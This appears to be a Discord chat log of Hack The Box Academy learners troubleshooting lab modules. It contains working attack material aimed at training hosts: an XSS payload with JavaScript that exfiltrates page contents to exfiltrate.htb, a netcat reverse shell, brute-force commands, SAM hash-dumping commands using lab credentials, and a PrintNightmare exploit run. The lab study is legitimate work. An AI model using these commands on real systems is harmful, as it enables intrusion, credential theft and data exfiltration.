#modules

and i also did for some other ports,,i tried using nc, instead of nc.exe, as well as using different cmd users.

actually the deal is

you are working with 172.16.1.5 while you should try the other ip avail

just ipconfig into your MS01 and put that ip to retrieve the powershell base64 command

it will work

the target ip?

generated for the task

target is correct i.e DC01/172.16.1.10

the attacker ip is what i am talking about the one your are listening from , machine MS01

just try that once and lmk if it works for you

So i do ipconfig, and then the ip i get i use for the reverse shell

yup

ok i will try that thanks

np

Hi i'm doing linux privilege escalation on Kernel exploit, I executed my binary, got root but can't access the flag, did I miss something ?

are u sure of the path?

ls -la the flag

And for the path its given :

Now im getting this, and i restarted my academy vpn and also the target so i dont know what the issue is.

forgot to ping or respond to you @midnight galleon

you're missing a command now, strange error message but could be that (edit: why are my fingers eating letters)

double powershell -e

I only did 1 double powershell -e it still has same error

what if you use the IP as the -Target ?

are u in a rbash?

wait let me spwan the target

still not working man, but ive been stuck on this for i while and im just gonna skip this one at this point.

wait it didnt work but now i came back to it it just randomly worked after like 30 seconds

thank you broo

I'm glad

Support helped me, was the exploit not working even if I could access root

Medusa -h IP -U user.list -P password.list -M ftp -n 2121 -t 16 this command is correct right?

Because I am trying to brute force ftp in attacking common service module and Medusa just ran through all the users and passwords in the list given to us and it didn't find the right creds

Not the right place

it is

And Medusa should stop once it found the right creds right?

ftp brute force is slow iirc

It's complete

Didn't find anything

https://tenor.com/view/we-dont-do-that-here-black-panther-tchalla-bruce-gif-16558003

maybe wordlist issue

It's the wordlist give to us inside of the same module

Medusa should stop once it found the right creds right?

ok lemme check

hey anyone here know how i could start learning to do ethical hacking

Tryhackme

i know how to do python and do cs but ik that wont help me

i have a job set up soon in a company that checks websites for vunrabilities so i need to learn all about it for the job

Yo everyone this channel is for solving modules inside of hack the box

Everything else goes in general

Create account on HTB verify and chat in general

it is working

the user starts with r

not here

To idk why but every time I brute force something it keeps going even after I use the -f flag

try hydra tbh

I had to create a file, paste all Medusa stuff in there, ask chatgpt to find any right creds and it found it inside of all that garbage

I would rather cut my balls and sew them back

I fucking hate brute forcing

it is what it is

When I started cybersec I thought there would be a lot of things I don't understand but one day they would make sense

This will never make sense

I put the flag specifically to stop brute forcing after the service found the creds and it keeps going

Fuck me

You go on HTB and you press the big yellow button "sign up"

It wont be bad to make a module about DDOS/DOS attacks

i don't really see the need as they are usually out of scope for pentests and red team assessments

There are blue team modules

there are, but what does that have to do with what you're suggesting

A blue team module for how to detect and defend against DDOS.

seems more like a preventative thing than a detection thing

but could be a mini-module

you can /feedback to suggest

hey guys, if I purchase VIP+ sub... will I get also access to Pwnbox in Academy modules?

no, the two platforms are separate and so are their subscriptions

Well u better figure it out

oh .. thats sad. I wish Academy had mothly sub that gets you access also to courses / learning paths. To be those are locked under 600 EUR annual plan.

there is the Student plan, but other than that you'll have to stick with getting cubes monthly

read #rules and #welcome

And the payment option is only inserting Credit Card info? I saw in support article option for PayPal, but it does not give me one, when I want to Add Payment Method

i'm not sure about that. you'll have to contact support

#1302329868968661133

I am stuck for the "XSS Filter Bypasses" from the "Advanced XSS and CSRF Exploitation" module. Can someone provide me some guidance?
I used the following encoded script in the vulnerablesite to callback the script from exploit server

3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fexploitserver.htb%3A50406%2Fexploit%3E%3C%2FSCRIPT%3E

Then I tried to use the basic payload on the exploitserver to see if i get back any data, but i get nothing:

var xhr = new XMLHttpRequest();
xhr.open('GET', '/home.php', false);
xhr.withCredentials = true;
xhr.send();

var exfil = new XMLHttpRequest();
exfil.open("GET", "http://exfiltrate.htb/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();

I get back on the exfiltrate.htb only the following request which didn't came from the vulnerablesite:

/favicon.ico
Host: exfiltrate.htb:33428
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://exfiltrate.htb:33428/log
Priority: u=6
X-Forwarded-For: 10.30.18.242
X-Forwarded-Host: exfiltrate.htb:33428
X-Forwarded-Server: exfiltrate.htb
Connection: Keep-Alive

I am stuck, and I can't get my mind around it

I have been stuck on the exploiting thick client section on attacking common applications for 3 weeks lol is it allowed if someone sends me the answer so I can move past it? I have grown too frustrated with it and its making me not want to spend time doing cpts path anymore.

I haven't done that module, but some thing that sticks out to me is the script doesn't look like its fully URL encoded. It might not be that but I usually URL encode the special char as well just in case

Yeah, but the input field where I insert that is protected, so if it's not encoded properly you will get an error saying that "some malicious code was detected" or something like that

3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fexploitserver%2Ehtb%3A50406%2Fexploit%3E%3C%2FSCRIPT%3E

I think the problem is the communication between the vulnerable app, the exploitserver and the exfiltrare server. The hint is saying that you should use no port in the payload for the exfiltrate.htb.

I spawned another machine and reset my vpn idk why it keeps doing that. Attacking common services - attacking smb

Nothing is showing in the exfiltrate.htb

The support team is working 24/7?

I am not sure.

No they take days to respond

There is probably a thread for the module online you can check there for some more hints. Like i said i havent done that module

I read everything on the forum regarding this, but as no hints are present, nothing from there is helping

Anyone who finished the module? 😦

@midnight galleon it keeps giving me this

I tried updating it, spawning new boxes, changed vpn, updated python, downloaded another smbmap file, download an smbmap.py file and still doesn't work

nmap says working?

smbclient

Have you tried from the AttackBox?

Nmap says there are smb shares, also smbclient show me there are shares but I need to see which share has read and write permission and the module uses smbmap

No I don't want to use it

Try to use it 🙂

When something that you are sure should be working, is not working. Try it from the AttackBox

use netexec

but if u want to stick to smbmap i will help

which module is it?

Attacking common services - attack smb

It's working on attackbox

Exactly 🙂

And it doesn't show me all that garbage that it shows me in vm

I had the same issue for multiple labs and modules

Some tools/commands won't work from your VM, which can be frustrating, but it is what it is

Mmhhhhh why tf is it not working

I just downloaded a new smbmap

yeah it disconnects from vm but works on pwnbox

might be timeout lemme increase it

@midnight galleon do you also get this?

no i get this

just use netexec

Hi! I am making a sightless machine but I cannot find the root flag. Anyone in the same situation?:/

sometimes

.

Man this shit is weird af

Why would it work from attackbox but not from other machines? And why you get a different error than me

It's WEIRD

#boxes

ok 🙂

prolly something to do with the vpn

Hello, I'm working on Windows Privilege Escalation with SeImpersonate privilege in the last module.
I think I got the success message but can't understand why the reverse shell is not connected as following:

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK```

Listener:
```root@dmz01:~# nc -nlvp 443
Listening on 0.0.0.0 443```

Without `PrintSpoofer64.exe` , just nc command `c:\Users\Public\nc.exe 172.16.8.120 443 -e cmd` was working.

The OS is Windows 2019, so I thought that I needed to use PrintSpoofer.
Anyone can give some help?

Yoo

Hello. Please read #welcome and #rules it will explain how to get verified

172.16.8.120 is this IP the one you are trying to connect the rev shell to?

Yes, that's DMZ's Internal IP.

Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___

Anyone who can help me with this?

i solved this question but am unsure what the intended way to solve it was, can anyone dm me the intended way

it's in the Introduction to Threat Hunting & Hunting With Elastic, Hunting Stuxbot

Hello im new and don't understand cyber security very well, where would the best place to ask questions about securing my devices, my public email address, my IP address, and what can be done with it, and other things of that nature?

if you're here to start learning about cybersecurity, then that's fine. but this server isn't a general online cybersecurity consulting place, and i'm not sure where the best place to ask your question would be

Are there any cloud related labs or pro labs that are cloud related for Azure, GCP, AWS?

Not sure about labs but have you seen: https://app.hackthebox.com/tracks/Cloud-Track

there is prolabs but business only

https://www.hackthebox.com/business/professional-labs/cloud-labs-blacksky

Thank you!

Hello, for the shells and payloads live engagement. When on the foothold machine, how do you access a browser?

Thank you!

local port forward the service?

but that is too early if u are doing it in order lemme see

I mean I know how to do that. I considered using ligolo, but got a permission denied. I feel like this should be fairly straight forward being that it's at the beginning of the course haha. Yet, I am struggling with this. I need the browser to be able to log into a web page, to upload a msfvenom payload.

oh did u connect with xfreerdp ?

I did.

then you should get a GUI right?

I do have the GUI, but I can’t find the browser anywhere. I don’t see Firefox chrome chromium or safari. I saw tor browser but that was failing.

firefox is on the jump host, just run firefox in the terminal

Thanks @dark hedge I’ll give that a shot.

it has a firefox

just not on the menu

yeah

u can also install whatever u what

it doesn't have PublicIP tho so u would need to do some file transfering

Can anyone help with this?

Were you able to complete this one? I've been stuck on it for a few hours, I could use some help.

I'm stuck on the last Python step before returning to powershell. I keep a bunch of errors. 😩

What are the errors?

Guys I'm in attacking common services - attacking sql databases.
For the first question it's asking me to find the password of mssqlsvc. I read on the forum that you have to use responder to steal the hash but it's not letting me do it. Also I tried to impersonate users, I tried to use xp_cmdshell. Like literally everything is denied

Do I have to brute force mssqlsvc password?

Nope

It's saying Excel xlsx file; not supported.

I'm also confused if I need to download setuptools-2.0, and XLRD separately. Or do I download XLRD inside setuptools?

Do I have to use responder?

It's always denied

Wdym "always denied"

I made an updated version of the tool

@fathom pendant It's denied when I'm in master and when I'm not in master, it's denied when I'm using mssql or tsql, it's denied when I try to switch user, it's denied when I try to use xp_cmdshell

Denied denied denied

Denied when I try to change advanced options

And denied when I try to look into tables

"Denied " isn't an error

End result is I still can't do anything

Even when I try to login with windows auth denied denied denied

hi so I tried looking for passwords the way it said in the Linux Credential Hunting section of Password Attacks module

when I use for-loops to search for passwords I don't find it

then I can't get laZagne running on target either because I upload it with ftp and it doesn't have the required modules to run and the target is not connected to the Internet

can someone help me with this?

I have password and logged into target as kira

but I'm trying to find Will's credentials on the target Linux box

I don't need you to help me find kira as I already have found her creds

whoever she is

can someone give me a hint as to where I need to look?

I don't have permissions to access sam's smb folder

I don't have permissions to unzip the notes folder

there's a bunch of things I don't have permission to access

and the password isn't "challengePassword" which is something I find in a file

I found that mysql was a user here

which is kind of weird

Sent you a dm

Try something else then

Ceald

You are the number one most unlikable person in here

In the Linux fundamentals module the File System Hierarchy chart is missing /sbin

You want help, but you insult people?
This combination is not very effective in my opinion

No I insult ceald, he always treats me like shit and makes me loose time

Most of the others are cool

@rustic sage what module are you doing and what are you trying to do?

I am stuck for the "XSS Filter Bypasses" from the "Advanced XSS and CSRF Exploitation" module. Can someone provide me some guidance?

try a different filter bypass

Try the owasp XSS payloads page in the section

Or at least I think it’s owasp
But there is a bypass payloads page in that section

From what I understand from the section I should first get the pop-up appear on the vulnerablesite, then try to do the exfiltration.

I'm in Windows Privilege Escalation - Windows Desktop Versions.

The error I get after trying to install xlrd is "TypeError: argument of type 'NoneType' is not iterable." I have no idea what that means or how to fix it. Any help?

Hey all! I'm in Shells & Payloads The Live Engagement. Is it possible to complete this section without the hints? As the hints provide information you need to complete the lab, and i cant figure out how i can enumerate it by myself! Thanks to anyone taking the time to read this!

Check the desktop

Doh. Thank you!

It gets everyone

Haha, yeah I was sitting there for a good couple of hours today going through all my enumeration stuff trying to find it. Lesson learned for next time!

Hi all, I'm on the AD Enumeration Module in the Bleeding Edge Vulnerability section, trying to get question #2 and I don't know why I'm getting this error and can't really figure it out. Any help is appreciated thanks.

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[*] Connecting to ncacn_np:172.16.5.5[\PIPE\spoolss]
[proxychains] Strict chain  ...  127.0.0.1:9050  ...  172.16.5.5:445  ...  OK
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\172.16.5.225\CompData\backupscript.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket/smbconnection.py", line 543, in writeFile
    return self._SMBConnection.writeFile(treeId, fileId, data, offset)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/smb3.py", line 1739, in writeFile
    written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/smb3.py", line 1447, in write
    if ans.isValidAnswer(STATUS_SUCCESS):
       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/smb3structs.py", line 460, in isValidAnswer
    raise smb3.SessionError(self['Status'], self)
impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/home/htb-ac-1497512/CVE-2021-1675/CVE-2021-1675.py", line 190, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/htb-ac-1497512/CVE-2021-1675/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rprn.py", line 657, in hRpcAddPrinterDriverEx
    return dce.request(request)
           ^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 860, in request
    self.call(request.opnum, request, uuid)
  File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 849, in call
    return self.send(DCERPC_RawCall(function, body.getData(), uuid))
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1302, in send
    self._transport_send(data)
  File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1239, in _transport_send
    self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv)
  File "/usr/local/lib/python3.11/dist-packages/impacket/dcerpc/v5/transport.py", line 543, in send
    self.__smb_connection.writeFile(self.__tid, self.__handle, data)
  File "/usr/local/lib/python3.11/dist-packages/impacket/smbconnection.py", line 545, in writeFile
    raise SessionError(e.get_error_code(), e.get_error_packet())
impacket.smbconnection.SessionError: SMB SessionError: code: 0xc00000b1 - STATUS_PIPE_CLOSING - The specified named pipe is in the closing state.

Does subbrute take a lot to start?

sam

is q3 of DACL ATTACKS II skills assessment broken? I have a clear path already but it seems Whisker does not work as intended? Btw I have the NTLM hash of one of the local admins in RD09.

why using proxychains? You can do it directly from the attack box.

guys any hint on Exploitation of PDF Generation Vulnerabilities in Injection attack modules about what is the internal application ? cuz have been trying different ips and ports and pathes nothing

Better post here:
https://discord.com/channels/473760315293696010/1263635449335910531

https://discord.com/channels/473760315293696010/477042232109826048

It shows no access

Read and follow, #welcome to access

Literally, he had everything just one message above 😅

Hi, Im having a problem with setting up parrot os, for one of the modules, is this the right place to be?

I mean #homelab-sysadm would be more appropriate for setting up tips

But you don't need to do everything from the setting up module

i got this when i rebooted after setting up the LVM

Yeah that's an issue with it not booting

I suggest going to the parrotsec discord and detailing the steps you chose

Heyy @cold star

Hey

Hi guys, any information regarding discount for htb academy in black friday or cyber?

I have never seen discounts at HTB academy on blackfriday before

Check dms

Hi, can someone help me in some doubts regarding C2 tools like evil-winrm/ NC.exe / PowerShell ? Related with the Shells and Payloads module.

Those aren't c2 tools

Also the shells and payloads module generally only requires the knowledge in it

Hello

It kinda sucks that the Attacking Common Applications pretty much doesnt give any cubes for the practice of every section.

guys i'm stuck in Privileged Groups section from linux privesc module i already found the flag but its refusing to accept it

Make sure you dont have a space in the beggining or the end of the flag

yup i checked those and i tried to add HTB{} to the flag but its not working

If you found the flag a certain way dont change it by adding HTB{}

yes ofc this is the first thing i did but didn't work

I dont know then. Havent done that module yet

Anybody's done Attacking GraphQL yet? The Information Disclosure section "After executing an introspection query, what is the flag you can exfiltrate?" I'm at a loss to what the heck i'm supposed to do

Hi guys

netexec rdp 10.129.210.6 --local-auth -u Bob -p HTB_@cademy_stdnt! --sam

it says -- sam is unrecognizaeble ...as this is originally a crackmapexec command, however crackmap is outdated and no longer maintained, I was wondering how I could use this with netexec

in htb academy they gave the crackmapexec command

Isn't it just one hypen for the SAM command ?

So -sam instead of --sam ?

Could be wrong here as not near computer

isnt that unfortunately

You are already doing --local-auth

i dont think you need -sam

My bad

why do they do it here then?

ill try without sam

O you are trying to dump the hashesh

well just use something else like impacket 😄

anddddd

When using the rdp protocol can you dump the sam ? Your command is checking credentials against rdp @pine dune

it didnt dump the hashes without sam

Why are you doing RDP ?

you gotta do SMB

ok ill try

try SMB first

ahh I didnt know., thanks for telling

alr cool

it says rdp

i didnt rdp to it.

You must rdp into the box

You can't dump the SAM using netexec with the Rdp protocol

i dont understand, why should i rdp to the box when i can do it remotely using netexec

ahh ok

Its just another way. Usually there is more than one way to these tasks. And he is correct

The RDP is to RDP into the machine

use SMB with netexec to dump hashes

do i have to rdp into the machine

what will i do with rdp in the machine?

cant i just do it remotely because i have the creds for the machine?

impacket-secretsdump Administrator:Password123@10.129.210.6

Or do maybe something like this. replace the ip and creds

ive rdp

ok let me try

netexec smb 10.129.210.6 --local-auth -u Bob -p HTB_@cademy_stdnt! --sam

Just do this command and you should be good to go

Session Security ---> Cross-Site Request Forgery (CSRF or XSRF) ---> If the update-profile request was GET-based and no anti-CSRF protections existed, would you still be able to update Ela Stienen's profile through CSRF? Answer format: Yes or No
I tried the <form id="submitMe" action="http://xss.htb.net/api/update-profile" method="GET"> but receive Cannot GET /api/update-profile, may I did anything wrong?

im a bit confused...why are we doing it over smb? Also ty...is smb the default?

Because you cant do it via RDP protocol. It just doesnt work that way. It is not meant for that. SMB protocol can do more than just sharing files. Like credentialed command execution

I am gonna spill my coffee.

ahh ok ty...also does smb need to be enabled on the target machine for it to work?

So listen it seems you really need to do this module.
https://academy.hackthebox.com/module/details/116

this is next in line for me

password attacks is just before

ahaaa. Well so dont worry then. It will become clearer when you get there. 🙂

@final shale do u know why its not giving me the hash?

try using --show at the end of the command

ok hold on

thx man it worked

😄

Is there a way to have two machines running simultaniously? Currently working at the Windows Evasion module and for the skills assessment you have to develop the malware and then test it on the target machine. I am not booting the development machine, shutting it down to boot the target machine just to find out that it got flagged there, then having to shut it down just to boot up the development machine until it works.. that's way too cumbersome

Yea there is. You just boot both of them...

It'd be very dumb not having to tested that out beforehand lmao 😄
If I do that the other machine is in the state "Checking machine state" and shutting down

Well thats weird, but i havent done that module so not sure

Gotta check back with the support then, but thanks nonetheless

I didn't notice a way to do it. PITA.

Good day everyone
I have question regarding this module "Password Attacks"
Specifically in the section : "Network Services" https://academy.hackthebox.com/module/147/section/1327
Exactly in the "Question 1 : Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."

So I realised first that cme(CrackMapExec) is not installed in pwnbox, so I did that manually by clonning the repo "git clone https://github.com/byt3bl33d3r/CrackMapExec" , then "cd CrackMapExec", then "python3 -m pip install ."
after that I got cme
So I used it "crackmapexec winrm 10.129.230.39 -u username.list -p password.list"
But I am getting this result :
""
┌─[eu-academy-6]─[10.10.12.15]─[htb-ac-745587@htb-v5yutstpjs]─[~]
└──╼ [★]$ crackmapexec winrm 10.129.230.39 -u username.list -p password.list
SMB 10.129.230.39 5985 WINSRV [] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
HTTP 10.129.230.39 5985 WINSRV [] http://10.129.230.39:5985/wsman
HTTP 10.129.230.39 5985 WINSRV [-] WINSRV\username.list:password.list
""

Which I believe is wrong (since I look at other solution and it shows that I should get something like this : )
""
SMB 10.129.202.136 5985 NONE [] None (name:10.129.202.136) (domain:None)
HTTP 10.129.202.136 5985 NONE [] http://10.129.202.136:5985/wsman
.
.
.
WINRM 10.129.202.136 5985 NONE [-] None\john:batman
WINRM 10.129.202.136 5985 NONE [-] None\john:password
WINRM 10.129.202.136 5985 NONE [-] None\john:iloveyou
WINRM 10.129.202.136 5985 NONE [-] None\john:princess
WINRM 10.129.202.136 5985 NONE [+] None\john:november (Pwn3d!)
""

And the questions is
What I did wrong ?

First use nxc. crackmap is deprecated at this point

oh thx
I tried now that
but it gaves me errors "" ImportError: cannot import name 'WIN_VERSIONS' from 'impacket.smb3' ""
Tried to fix it , it sound fixed ("" pip show impacket "" "" pip install --upgrade impacket "")
then I run
""
└──╼ [★]$ nxc winrm 10.129.230.39 -u username.list -p password.list
WINRM 10.129.230.39 5985 WINSRV [*] Windows 10 / Server 2019 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM 10.129.230.39 5985 WINSRV [-] WINSRV\username.list:password.list

""

maybe this section need to be updated I guess , since it is out-to-date

What is your python version?

if its 3.12 above pip should work only in env

are these username.list:password.list files in the location from which you are running nxc? try the full path

Guided Lab: Traffic Analysis Workflow
https://academy.hackthebox.com/module/81/section/962#questionsDiv

OK I'm stuck. The Worksheet Answer file Walkthrough Answers.md has completely different IP Addresses from my live capture. Should I be using just the supporting packet file from the Resources tab? This is REALLY frustrating this is my first HTB guided lab and its really poorly constructed!!!! 😡 Any help would be greatly appreciated. Thank you

You get frustrated too easily :D. Try harder

Its almost like HTB sets it up that way.

anyone got an idea why ?

I am doing that module next

omg there was two flags i thought they were the same but one of them had one more letter no way i wasted so much time zzzzz

Sometimes it happens

Attacking Common Applications > GitLab - Discovery and Enumeration
Why is the box throwing a 502? VPN issue or...?

Fixed itself anyway, but thanks.

Just refreshed the page and it started working.

Hello, I have some issues understanding the first question https://academy.hackthebox.com/module/147/section/1639
Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect?
I exported TGT tickets via mimikatz but how do I know how many of these are related to users?
NVM: solved

i need help regarding advanced deserialization attacks JSON, it requires .NET 4.8 but its not possible to install it what to do

im getting this error im not sure if its because of .net version

why isn't it possible to install?

4.8 is preinstalled with win 11, you can also just download it from microsoft's website

You guys waiting for the new machine?

no

hello! can somebody help me with Certified Machine? Thanks!

There is a #boxes thread. This is only for Academy modules.

Don't have access..

gotcha

#1302329868968661133

get access by reading and following #welcome

Are you a new team member?

no

Intro to Whitebox pentest
Final Assessment, Patching question

I pasted the patched code and Injection did failed
So my patch is correct right, Then why it is not showing flag

I'm just going to take a wild guess. But you didn't write your patch within the function

Yes correct it was before function call. I'll try that

Hey guys i'm kind of stuck on the last 2 exercises of the skills assessment in the attacking WPS module, I tried to brute force the pin but the AP keeps locking out, the problem is, we don't have mdk4 in the machine I RDP to in order to crash the AP using authentiaction DOS, and get rid of the locking, did anyone complete the module yet, it's pretty new, it would great if anyone can help me, BTW, i already tried a pixie dust attack both APs are not vulnerable to it, I also got a list of default pins using the APs BSSIDs and stored them in a variable in my script to reiterate over each likely pin, the problem, like I said, is that I keep getting locked, and the only way I know of bypassing this is by through flooding the access point in order to reset, which we can't do since we don't have mdk4

There is a script in the module that loops the PIN codes with a time delay so it doesnt lock. Use the list with possible default pins and that script.

I did, the problem is that I keep getting locked out... i used the same script: #!/bin/bash
#We add generated PINs into this list
PINS='<pin list separated by space>'
for PIN in $PINS
do
echo Attempting PIN: $PIN
sudo reaver --max-attempts=1 -l 100 -r 3:45 -i mon0 -b 60:38:E0:A2:3D:2A -c 1 -p $PIN
done
echo "PIN Guesses Complete"

Doesnt the AP unlock after 1 min or something?

it does but then it locks again after one trial, did you finish the module yet?

yes. I just dont remember exactly what was the deal

just to make sure, did you use mdk4 at all ? or did you just rely solely on the script? because at this point brute forcing the PIN seems to be the only option i just need to know how to bypass the locking

there was no mdk.

yo i am on the skills assesment for attacking web applitcations w/ ffuf, i installed the fuff program cause the "update" and i did the whole echoing the ip address to be academy.htb but a small thing appeared for me when i entered ||ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://academy.htb:PORT/ || and many other formats of this nothign seemed to be gained from the fuzzing, idk why that is but yeah

Because your command isn't fuzzing anything

To fuzz for subdomains in this context you need to add -H " HOST: FUZZ.academy.htb" (note you'll also potentially need to filter)

could you get back to me if you remember

oh wrong channel

Dumping lsass using procdump in sliver does not seem to work anymore.

hey it's acceptable to use htb forums to solve technical difficulties or errors right?

or should i not get into the habit of doing that

like just now i had to fix a metasploit module and there's no way i would have figured out the solution myself

Hi there looking at the Active Directory LDAP module and specifically the LDAP Overview section. I'm trying to get the How many users exist in the INLANEFREIGHT.LOCAL domain? question but I can't seem to get the answer. I tried running || Get-ADObject -LDAPFilter '(objectClass=user)' -SearchBase 'DC=INLANEFREIGHT,DC=LOCAL' | measure|| but the number of users returned there are not the same as what the module wants. Am I missing something conceptually here in how I'm approaching this? I would think this would grab the users appropriately.

EDIT: Managed to solve this; for those curious the query was returning extra objects that were not of the right type so I was getting extra results; had to change the command being run.

Hello,

I have a question regarding “Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe”. I conducted an analysis similar to the one outlined in this section and was able to find the solution manually. However, for the next question, I successfully wrote a custom query to solve it.

In the first question case, I attempted to create a custom query to search within a specific timeframe, but I keep receiving an "invalid query" message. I'm wondering if anyone else has managed to solve this using a custom query that filters by timeframe (e.g 2024-11-08T10:23:25.000Z - 2024-13-08T10:23:25.000Z)Note: I did not experience any issue when using a custom query that filters for a specific time.
(CDSA).

Hi all;
excited to be here is my first time and i have a question regarding the feroxbuster performance.
While i was scanning the target IP:PORT with recursive option etc, by scanning i observed that scanning was performed with ~1000/sec and after a while distributed within L1-L3 with ~300/sec

I wonder if fuzzing performance depents on the machines CPU/RAM and,or my internet speed ?
My execution command was the following:

$ feroxbuster -u http://94.237.59.119:50298/recursive_fuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html -t 200 -C 400,404,401

Depends, mostly its constrained by both ends of the network speed (aka internet speed of the server you are targeting and your internet speed) as well as how fast the target application is willing to consume the data. If you end up sending data too fast some applications will think you are trying to DoS the app and will stop responding for a period of time. This is why a lot of fuzzing applications have a backoff approach where they may start off fast and then slow down a bit down the line when they get a better idea of how fast the application is willing to respond.

That being said I don't know if this is 100% the case here as I'm not clear on what you mean by "distributed within L1-L3" but hopefully that might help conceptually r.e possible approaches feroxbuster is taking.

I have filtered the input, Manually tested, Now code execution is not possible.
I am getting output when ran locally
Output format same as original output or should I log password in a different format.

Hey tek, thanks for answering. I think i solved the issue. I changed on my VM from NAT to bridged Network and suddently the scan afterwards jumped from ~1000/sec to ~6500/sec. Once feroxbuster reached L3 the performance was distributed/shared among L1 to L3 with around ~4500/sec each.
I should maybe also consider to throttle down the scan in order to prevent security mechanism on the target IP:PORT to prevent window-size loss when data traffic is ongoing.

Nice, glad that worked! And yeah on real world tests you'd likely want to scale it down; I've seen similar things with stuff like NMap where one would skip over services on hosts if you pushed it to go too fast as the target host couldn't keep up or had security controls in place.

I'm on command injection skill assessment does I've been injection on GET /index.php?to=tmp with whoami and pwd and nothing coming back in terms of filtering. Any tips?

Looking at the Active Directory LDAP module and its Active Directory Search Filters section, and am stuck on the question Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group.

I was under the impression that this had already been covered in the course materials but the users I got back don't seem to be accepted as correct answers?

Possible it may be blind command injection by any chance whereby it executes the command but doesn't return the results back to you?

I was thinking that but to find the flag I need to enumerate where I am on the server

Did you test every parameter?

I believe so

You didn't mention which module/section so it may be a while before you get help. Also it looks like you're spoiling some content you should delete your spoiler tag.

Did you break out the original command

Thanks reworded the question and deleted the spoiler section, let me know if it needs further updates.

Pretty sure you need to use the LDAP filter that looks in the protected group.

Yeah I did

Dm the command

hi

On the AD Bloodhound module - Edges section, Do we suppose to RDP with user grace? I can't with given credentials. I tried via evil and psexec, I couldnt either

Trying to complete the "ForceChangePassword" edge attack.

Hmm thought I had that already, that's why I'm confused. Unless I'm meant to be searching for a different protected group than the one the module mentions?

the question itself says which group.. the Protected Users group

or you can search spn's i guess

Mess around with different functions

Hi everyone im a lil bit stuck on the Wi-Fi Penetration Testing Basics - Skills Assessment, i managed to answer the first question. Im trying to capture trafic to then try to crack with aircrack ng but didnt manage to. Any hint ?

bump?

https://tenor.com/view/hopeless-disappointed-ryan-reynolds-facepalm-embarrassed-gif-15295898

Creds are given below, lol... I guess is time for a break

Hi everyone, I'd like to inquire about the upcoming University CTF competition. Can a recent graduate whose school email has been deactivated participate?

I believe it required a uni email

#1296444291291287633

is that possible ?!
┌─[eu-academy-6]─[10.10.15.69]─[htb-ac-745983@htb-ul6aspltvo]─[~]
└──╼ [★]$ locate username.list
┌─[eu-academy-6]─[10.10.15.69]─[htb-ac-745983@htb-ul6aspltvo]─[~]
└──╼ [★]$ locate password.list
┌─[eu-academy-6]─[10.10.15.69]─[htb-ac-745983@htb-ul6aspltvo]─[~]
└──╼ [★]$

I am stuck here now

you dont have the files with the usernames and passwords

correct !
But I am using the instance of pwnbox

isn't should be there by default ?
I mean the usernames and passwords ?

aaaaaaaah

I found an attachement

to download

Password-attacks.zip

Yea !
It works finally

Thanks @final shale

That's not how it works

You'll still need to install or download the occasional wordlist here or there

Yea

Make suren to post spoilers about the module

Can anyone help me with this?

you should edit that as it gives a lot of the skill assessment away

When I am asking too simple questions, it's not good, when I ask a very complex with a lot details question is not good again. I don't understand this Discord server at all..

you can ask questions without spoiling content

I edited it, delete everything

as for your question, maybe try getting another page

